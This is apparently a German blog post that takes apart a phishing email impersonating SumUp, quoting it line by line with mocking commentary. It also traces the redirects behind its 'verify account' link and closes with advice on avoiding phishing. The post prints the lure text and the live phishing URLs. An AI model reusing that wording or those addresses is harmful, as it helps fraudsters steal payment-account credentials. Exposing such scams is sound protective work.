Oh, aus einem WordPress-Blog. Wer sich fragt, warum ich immer diese albernen roten Texte „Spam“ oder „Phishing“ über Bildmaterial von Spammern mache, hat hier einen Teil der Antwort. Wenn man den Missbrauch der Bilder durch Spammer nicht wirksam verhindert, wird man schnell zum bequemen und anonymisierenden Bildhoster für Trickbetrüger. Ich habe jedenfalls nicht die Absicht, zum Gehilfen des Geschmeißes zu werden.

Hallo,

So genau wurde ich ja schon lange nicht mehr bei meinem Namen angesprochen!

Willkommen bei SumUp! Bevor Sie mit dem Akzeptieren von Zahlungen beginnen, nehmen Sie sich bitte einen kurzen Moment Zeit, um Ihr Konto zu verifizieren.

Haben die Spammer diesen Absatz aus einer echten Mail von SumUp übernommen? Er klingt schon sehr nach einem Neukunden, der die ersten Einrichtungsschritte machen soll.

So stellen wir sicher, dass Ihre Transaktionen geschützt sind und alle EU-Vorgaben erfüllt werden.

Dieser Bullshit kommt allerdings eher aus der blühenden Fantasie eines Trickbetrügers. Ein Unternehmen, das Zahlungsabwicklung als technische Dienstleistung anbietet, wird ganz sicher nicht den Schutz der Transaktionen und die Einhaltung von gesetzlichen Regelungen in Frage stellen, sondern dafür sorgen, dass das wie unausgesprochene Selbstverständlichkeit erscheint. 😅️

Ich schreibe ja auch nicht in Unser täglich Spam, dass die Website frei von Schadsoftware ist und sicherstellt, die gesetzlichen Regelungen in der Bundesrepublik Deutschland einzuhalten. Da kriegen die Leute ja Angst, wenn man glaubt, so etwas betonen zu müssen! 👻️🤭️

Die Verifizierung ist erforderlich, um Ihr Konto zu aktivieren und die Zahlungsabwicklung freizuschalten.

Ganz schlecht formuliertes Phishing. Das klingt wieder sehr nach Neukunde. Ich tippe mal darauf, dass in der Betrügerbande niemand Deutsch kann.

Mein Konto verifizieren

Der Link geht natürlich nicht zu SumUp, und er ist auch nicht direkt gesetzt:

$ location-cascade https://sddlbd.net/pal
     1	https://sddlbd.net/pal/
     2	https://www.lightofhopeindia.com/de/sumup
     3	https://www.lightofhopeindia.com/de/sumup/
$ _

So so, das Licht der Hoffnung für Indien. 🤣️

Wo der Link hingeht, sieht man übrigens in der Statuszeile seiner Mailsoftware, wenn sich der Mauszeiger über dem Link befindet, ohne dass man klickt. Dieses sddlbd sieht nicht einmal so ähnlich wie SumUp aus. Es sage also niemand, dass man nicht gewarnt ist!

Falls der Button nicht funktioniert, kopieren Sie bitte diesen Link und fügen Sie ihn in Ihren Browser ein:

Fehlt dahinter nicht irgendwas? Zum Beispiel der Link? Wenn ich „Mein Konto verifizieren“ kopiere und in meinen Browser einfüge, komme ich sicherlich nicht zum Ziel. (Dafür müsste ich im Kontextmenü des Links so etwas wie „Linkadresse kopieren“ auswählen.) Ich habe ja schon geschrieben, dass ich glaube, dass in dieser Betrügerbande niemand Deutsch kann.

Die Phishing-Seite neben dem Licht der Hoffnung für Indien, auf der man zu guter Letzt landen soll, sieht übrigens so aus:

Die Zugangsdaten, die man dort eingibt, und alle weiteren Daten, mit denen man anschließend sein Konto „verifiziert“, gehen direkt zu Trickbetrügern. Um zu sehen, dass man nicht bei SumUp ist, reicht es völlig, einmal in die Adressleiste seines Webbrowsers zu schauen.

Noch schlauer ist es allerdings, nicht und niemals in eine E-Mail zu klicken, denn dann kann einem kein Trickbetrüger so leicht einen giftigen Link unterschieben. Stattdessen ein Lesezeichen im Webbrowser anlegen. Wenn dann einmal so eine „komische Mail“ kommt und man unsicher wird, einfach die Website klicki-klicki über das Lesezeichen aufrufen und sich dort wie gewohnt anmelden (hoffentlich mit einem guten Passwortmanager und zugehörigem Browser-Plugin)! Wenn man dort dann keinen Hinweis auf das Problem sieht, das in der Mail behauptet wurde, hat man einen dieser gefürchteten Cyberangriffe abgewehrt, einen Schaden in der Größenordnung einiger tausend bis zehntausend Euro verhindert und sich jahrelangen Ärger erspart, weil das von Betrügern übernommene Konto nicht für Betrugsgeschäfte aller Art missbraucht wurde. So einfach geht das! Einfach niemals in E-Mails klicken! Macht das! 🛡️

Ja, ich weiß selbst, dass es etwas abrupt ist, aber die Spam ist hier schon am Ende. Ohne Gruß und… vor allem… ohne das für gewerbliche E-Mail im Rechtsraum der Bundesrepublik Deutschland obligatorische E-Mail-Impressum. Ist es nicht schön, wie alle rechtlichen Vorgaben eingehalten werden? 😁️

Dieses spezielle Phishing als Spam zu erkennen, ist zum Glück sehr einfach und erfordert keine technischen Kenntnisse, und ich glaube nicht, dass viele darauf reinfallen. Aber man hat nicht immer das Glück, dass Betrüger so dumm sind.